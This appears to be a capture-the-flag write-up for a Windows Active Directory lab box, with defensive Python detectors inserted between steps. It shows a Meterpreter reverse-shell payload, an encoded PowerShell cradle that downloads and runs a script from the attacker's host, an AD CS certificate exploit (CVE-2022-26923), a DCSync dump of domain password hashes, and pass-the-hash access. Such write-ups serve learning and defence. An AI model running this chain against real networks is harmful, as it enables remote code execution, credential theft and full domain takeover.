Certification
Enumeration:
sudo nmap -sS -sV -Pn -p- -T4 -n --open -A -oA certification-full-sweep 10.129.230.126
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-15 16:09:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certification.htb0., Site: Default-First-Site-Name)
8000/tcp open http-alt
|_http-open-proxy: Proxy might be redirecting requests
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57496/tcp open msrpc Microsoft Windows RPC
59262/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64924/tcp open msrpc Microsoft Windows RPC
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.230.126
SMB 10.129.230.126 445 CFN-SVRDC01 [*] Windows 10.0 Build 20348 x64 (name:CFN-SVRDC01) (domain:certification.htb) (signing:True) (SMBv1:False)
Visit http://10.129.230.126:8000/ and log in with admin:admin. http://10.129.230.126:8000/settings/global allows you to define commands that are triggered by different events, e.g., Before Rename.
Preparation:
msfvenom -p windows/x64/meterpreter/reverse_https lhost=tun0 lport=443 exitfunc=thread -f ps1
nano Public/bp-simple-runim64.ps1
echo -n "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.14.43/bp-simple-runim64.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
powershell.exe -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA
cd Public/
sudo python3 -m http.server 80
Now trigger command execution by, for example, renaming a folder (http://10.129.230.126:8000/files/) and receive a Meterpreter session.
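The -enc argument above is nothing more than base64 over the UTF-16LE encoding of the script, which is why the echo | iconv | base64 pipeline is needed to build it. As an added example (my code, not part of the original write-up), the Python below does the reverse for a defender looking at process-creation logs: it pulls the blob out of a command line, decodes it, and reports download-cradle indicators and any URL the script fetches. The indicator list, the regexes and the function names are my own assumptions; the sample command line is the one from the write-up.

```python
import base64
import re
from typing import Dict, List, Optional

# Sample input: the exact command line the write-up configured the web
# application to run (copied from above).
SAMPLE_CMDLINE = (
    "powershell.exe -enc "
    "aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQA"
    "cgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALgA0ADMALwBiAHAALQBzAGkAbQBwAGwAZQAtAHIAdQBuAGkAbQA2ADQALgBwAHMAMQAnACkA"
)

# Indicators typical of PowerShell download cradles (assumed list). A hit is a
# triage lead, not proof of compromise; some admin scripts use these too.
CRADLE_PATTERNS: List[str] = [
    r"\biex\b",
    r"invoke-expression",
    r"downloadstring",
    r"downloadfile",
    r"net\.webclient",
    r"invoke-webrequest",
    r"frombase64string",
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand for the same parameter.
ENC_FLAG_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def extract_encoded_blob(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -enc/-EncodedCommand, or None if absent."""
    m = ENC_FLAG_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(blob: str) -> str:
    """Decode the blob the way powershell.exe does: base64, then UTF-16LE."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def triage_command_line(cmdline: str) -> Dict[str, object]:
    """Decode an encoded command line and list cradle indicators and URLs."""
    blob = extract_encoded_blob(cmdline)
    if blob is None:
        return {"encoded": False, "decoded": None, "indicators": [], "urls": []}
    decoded = decode_encoded_command(blob)
    lowered = decoded.lower()
    indicators = [p for p in CRADLE_PATTERNS if re.search(p, lowered)]
    # URLs are the fastest pivot into proxy/DNS logs for the rest of the host fleet.
    return {
        "encoded": True,
        "decoded": decoded,
        "indicators": indicators,
        "urls": URL_RE.findall(decoded),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage_command_line(SAMPLE_CMDLINE), indent=2))
```

Run against the sample, the decoded text is exactly the one-liner from the echo command above, and both the iex and DownloadString indicators fire, together with the staging URL. Script block logging (Event ID 4104) would show the same decoded text on the host, but command-line decoding is what you have when only process-creation events were collected.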
meterpreter > cat user.txt
HTB{Abu51ng_F34tur3s_4r3_fun}
Nice. Discover user credentials in applist.ps1:
meterpreter > cat applist.ps1
$user = "daniel.morgan"
$pass = "FDOnolk(naws)"
The challenge name hints at AD CS. A recent AD CS vulnerability, CVE-2022-26923, is the obvious candidate.
Enumeration:
certipy find 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb'
...
Template Name                       : Machine
Certificate Authorities             : certification-CFN-SVRDC01-CA
Enabled                             : True
Client Authentication               : True
Enrollee Supplies Subject           : False
Certificate Name Flag               : SubjectRequireDnsAsCn
                                      SubjectAltRequireDns
Enrollment Flag                     : AutoEnrollment
Extended Key Usage                  : Client Authentication
                                      Server Authentication
Requires Manager Approval           : False
Application Policies                :
Authorized Signatures Required      : 0
Validity Period                     : 1 year
Renewal Period                      : 6 weeks
Permissions
  Enrollment Permissions
    Enrollment Rights               : CERTIFICATION.HTB\Domain Admins
                                      CERTIFICATION.HTB\Domain Computers
                                      CERTIFICATION.HTB\Enterprise Admins
...
Looks good! Exploitation:
sudo nano /etc/hosts
10.129.224.146 CFN-SVRDC01 certification.htb CFN-SVRDC01.certification.htb
(IP address has changed due to reboots)
Create a new machine account wtf$ and use the flag -dns to abuse CVE-2022-26923.
certipy account create 'certification.htb/daniel.morgan@CFN-SVRDC01.certification.htb' -user wtf -dns 'CFN-SVRDC01.certification.htb'
Certipy v3.0.0 - by Oliver Lyak (ly4k)
Password:
[*] Creating new account:
    sAMAccountName       : wtf$
    unicodePwd           : J6AeabTzuSGNFElP
    userAccountControl   : 4096
    servicePrincipalName : HOST/wtf
                           RestrictedKrbHost/wtf
    dnsHostName          : CFN-SVRDC01.certification.htb
[*] Successfully created account 'wtf$' with password 'J6AeabTzuSGNFElP'
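What makes the account above dangerous is visible in its attributes: sAMAccountName wtf$ with a dnsHostName that belongs to the domain controller, created by an ordinary user because the machine account quota allows it. As an added example (my code, not from the write-up or from Certipy), the Python below runs the two checks a defender would apply to an export of computer objects: a dnsHostName that does not match the account's own name, and a dnsHostName shared by several computer objects, plus the machine account quota as a precondition. The snapshot of computer objects is constructed in the shape an LDAP export would give, the quota value of 10 is the AD default and an assumption here, and the function names are mine.

```python
from typing import Dict, List, Optional

# Constructed snapshot of computer objects (only the attributes this check
# needs). The last entry mirrors the wtf$ account created above.
SAMPLE_COMPUTERS: List[Dict[str, Optional[str]]] = [
    {"sAMAccountName": "CFN-SVRDC01$", "dnsHostName": "CFN-SVRDC01.certification.htb"},
    {"sAMAccountName": "CFN-WKS001$", "dnsHostName": "CFN-WKS001.certification.htb"},
    {"sAMAccountName": "SETUPMACHINE$", "dnsHostName": None},
    {"sAMAccountName": "wtf$", "dnsHostName": "CFN-SVRDC01.certification.htb"},
]
SAMPLE_DOMAIN = "certification.htb"
SAMPLE_MAQ = 10  # assumed ms-DS-MachineAccountQuota; 10 is the AD default


def expected_dns_host_name(sam_account_name: str, domain: str) -> str:
    """dnsHostName a computer account should carry: <name without $>.<domain>."""
    return f"{sam_account_name.rstrip('$')}.{domain}".lower()


def find_dns_host_name_mismatches(computers, domain: str) -> List[Dict[str, str]]:
    """Computer objects whose dnsHostName does not derive from their own name.

    This is the attribute CVE-2022-26923 abuses: the Machine template builds
    the certificate subject from dnsHostName, so a self-created account that
    points at the DC's FQDN is issued a certificate the KDC maps to the DC.
    Patched DCs (May 2022 update) validate the attribute on write; unpatched
    ones accept it, which is what this check catches after the fact.
    """
    findings = []
    for c in computers:
        dns = c.get("dnsHostName")
        if not dns:
            continue  # attribute unset: not usable for this path, review separately
        expected = expected_dns_host_name(c["sAMAccountName"], domain)
        if dns.lower() != expected:
            findings.append(
                {"sAMAccountName": c["sAMAccountName"], "dnsHostName": dns, "expected": expected}
            )
    return findings


def find_duplicate_dns_host_names(computers) -> Dict[str, List[str]]:
    """dnsHostName values shared by more than one computer object."""
    by_dns: Dict[str, List[str]] = {}
    for c in computers:
        dns = (c.get("dnsHostName") or "").lower()
        if dns:
            by_dns.setdefault(dns, []).append(c["sAMAccountName"])
    return {dns: sams for dns, sams in by_dns.items() if len(sams) > 1}


def assess_certifried_exposure(computers, domain: str, machine_account_quota: int) -> Dict[str, object]:
    """Combine the checks into one report for the domain."""
    mismatches = find_dns_host_name_mismatches(computers, domain)
    duplicates = find_duplicate_dns_host_names(computers)
    return {
        "machine_account_quota": machine_account_quota,
        # With a quota above 0 any authenticated user can create the account
        # the attack starts from; setting it to 0 removes that precondition.
        "users_can_add_computers": machine_account_quota > 0,
        "dns_host_name_mismatches": mismatches,
        "duplicate_dns_host_names": duplicates,
        "at_risk": bool(mismatches or duplicates),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(assess_certifried_exposure(SAMPLE_COMPUTERS, SAMPLE_DOMAIN, SAMPLE_MAQ), indent=2))
```

On the sample, wtf$ is reported both as a mismatch (expected wtf.certification.htb) and as a duplicate of the DC's dnsHostName. The same comparison works on a live export of all objectClass=computer entries; the quota comes from the ms-DS-MachineAccountQuota attribute on the domain object.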
Now request a certificate. The only difference from the blog post is the flag -dynamic-endpoint (it did not work without it).
certipy req 'certification.htb/wtf$:J6AeabTzuSGNFElP@CFN-SVRDC01.certification.htb' -ca certification-CFN-SVRDC01-CA -template Machine -debug -dynamic-endpoint
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'CFN-SVRDC01.certification.htb' at '10.211.55.1'
[+] Generating RSA key
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.224.146[65389]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.224.146[65389]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with DNS Host Name 'CFN-SVRDC01.certification.htb'
[*] Certificate object SID is None
[*] Saved certificate and private key to 'cfn-svrdc01.pfx'
Use the certificate to authenticate as the domain controller's machine account and retrieve its NT hash:
certipy auth -pfx cfn-svrdc01.pfx -dc-ip 10.129.224.146
Certipy v3.0.0 - by Oliver Lyak (ly4k)
[*] Using principal: cfn-svrdc01$@certification.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'cfn-svrdc01.ccache'
[*] Trying to retrieve NT hash for 'cfn-svrdc01$'
[*] Got NT hash for 'cfn-svrdc01$@certification.htb': d85512d5e138a972140986b9cc664d7a
DCSync with the DC's machine account:
/home/parallels/.local/bin/poetry run crackmapexec smb 10.129.224.146 -u cfn-svrdc01$ -H d85512d5e138a972140986b9cc664d7a --ntds
SMB 10.129.224.146 445 CFN-SVRDC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.224.146 445 CFN-SVRDC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB 10.129.224.146 445 CFN-SVRDC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.224.146 445 CFN-SVRDC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB 10.129.224.146 445 CFN-SVRDC01 daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\timothy.newton:2101:aad3b435b51404eeaad3b435b51404ee:403e1f280556b28a91c684240102a0e3:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\ruth.williams:2102:aad3b435b51404eeaad3b435b51404ee:c510b26a2f8edfd216f613b1f5eb6e3c:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nancy.spear:2103:aad3b435b51404eeaad3b435b51404ee:766a0f8cd98d4be3b63782e6428a1b25:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\robert.patterson:2104:aad3b435b51404eeaad3b435b51404ee:a485150cca1fee22c71fea688188ae1f:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\nathan.spear:2105:aad3b435b51404eeaad3b435b51404ee:f957fcf75f284a8bb3f685cd0a34ac9f:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-WKS001$:1103:aad3b435b51404eeaad3b435b51404ee:8a040366cbb7be0816ec65c58ae97bac:::
SMB 10.129.224.146 445 CFN-SVRDC01 SETUPMACHINE$:3601:aad3b435b51404eeaad3b435b51404ee:e55b6e781f9bdc4199dcc7581b7f680c:::
SMB 10.129.224.146 445 CFN-SVRDC01 wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::
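The dump above is in the user:rid:lmhash:nthash::: format that an in-house password audit of an NTDS export produces as well. As an added example (my code, not from the write-up or from CrackMapExec), the Python below parses such lines and reports the hygiene findings an auditor wants without cracking anything: accounts with an empty password, accounts that still store an LM hash, and the same password reused across user accounts. The sample input takes lines from the dump above plus one constructed line (svc_backup, reusing daniel.morgan's hash) to exercise the reuse check; the well-known empty-hash constants are standard values.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Well-known values in secretsdump-style output.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored

# One record per line: [DOMAIN\]user:rid:lmhash:nthash:::  Any tool prefix such
# as "SMB <ip> 445 <host>" is skipped because the record is searched, not matched.
RECORD_RE = re.compile(
    r"(?P<user>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)

# Sample input: lines from the dump above, plus the constructed svc_backup line.
SAMPLE_DUMP = r"""
SMB 10.129.224.146 445 CFN-SVRDC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:30d9a71719214d675de29308730c0cb0:::
SMB 10.129.224.146 445 CFN-SVRDC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.224.146 445 CFN-SVRDC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:60f1596c192904336a13ffbec1e4a682:::
SMB 10.129.224.146 445 CFN-SVRDC01 daniel.morgan\daniel.morgan:1104:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB 10.129.224.146 445 CFN-SVRDC01 certification.htb\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:1a6bd44c29ac2b1f6dad125f8833fe50:::
SMB 10.129.224.146 445 CFN-SVRDC01 CFN-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d85512d5e138a972140986b9cc664d7a:::
SMB 10.129.224.146 445 CFN-SVRDC01 wtf$:7601:aad3b435b51404eeaad3b435b51404ee:c92817881ec894b7b6a538bf7cb4dbbb:::
"""


def parse_dump(text: str) -> List[Dict[str, object]]:
    """Parse dump lines into account records; lines without a record are skipped."""
    accounts: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if not m:
            continue
        user = m.group("user").split("\\")[-1]  # drop a DOMAIN\ prefix
        accounts.append({
            "user": user,
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
            "is_machine": user.endswith("$"),
        })
    return accounts


def audit_accounts(accounts: List[Dict[str, object]]) -> Dict[str, object]:
    """Hygiene findings from a hash export, without cracking anything."""
    # Empty NT hash: the password is blank. For a disabled Guest this is normal;
    # for an enabled account it is an immediate finding.
    empty_password = [a["user"] for a in accounts if a["nt"] == EMPTY_NT_HASH]
    # A real LM hash means the weak LM scheme is still stored for that account.
    lm_hash_stored = [a["user"] for a in accounts if a["lm"] != EMPTY_LM_HASH]
    # Group user accounts by NT hash; identical hashes mean identical passwords.
    # Machine accounts are skipped: their passwords are random and rotate.
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for a in accounts:
        if not a["is_machine"]:
            by_nt[a["nt"]].append(a["user"])
    reused = [users for h, users in by_nt.items() if len(users) > 1 and h != EMPTY_NT_HASH]
    return {
        "total": len(accounts),
        "machine_accounts": sum(1 for a in accounts if a["is_machine"]),
        "empty_password": empty_password,
        "lm_hash_stored": lm_hash_stored,
        "reused_password_groups": reused,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(audit_accounts(parse_dump(SAMPLE_DUMP)), indent=2))
```

On the sample, Guest is the only blank password, no LM hashes are stored (the LM field is the well-known placeholder everywhere), and daniel.morgan and the constructed svc_backup share a password. The same parser accepts plain secretsdump output, since the tool prefix is optional.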
Collect the flag:
impacket-smbclient -hashes :30d9a71719214d675de29308730c0cb0 administrator@CFN-SVRDC01.certification.htb
# use C$
# cd Users
# cd Administrator
# cd Desktop
# cat root.txt
HTB{c3rtif1c4t35_c4n_8e_f4k3d}
Excellent.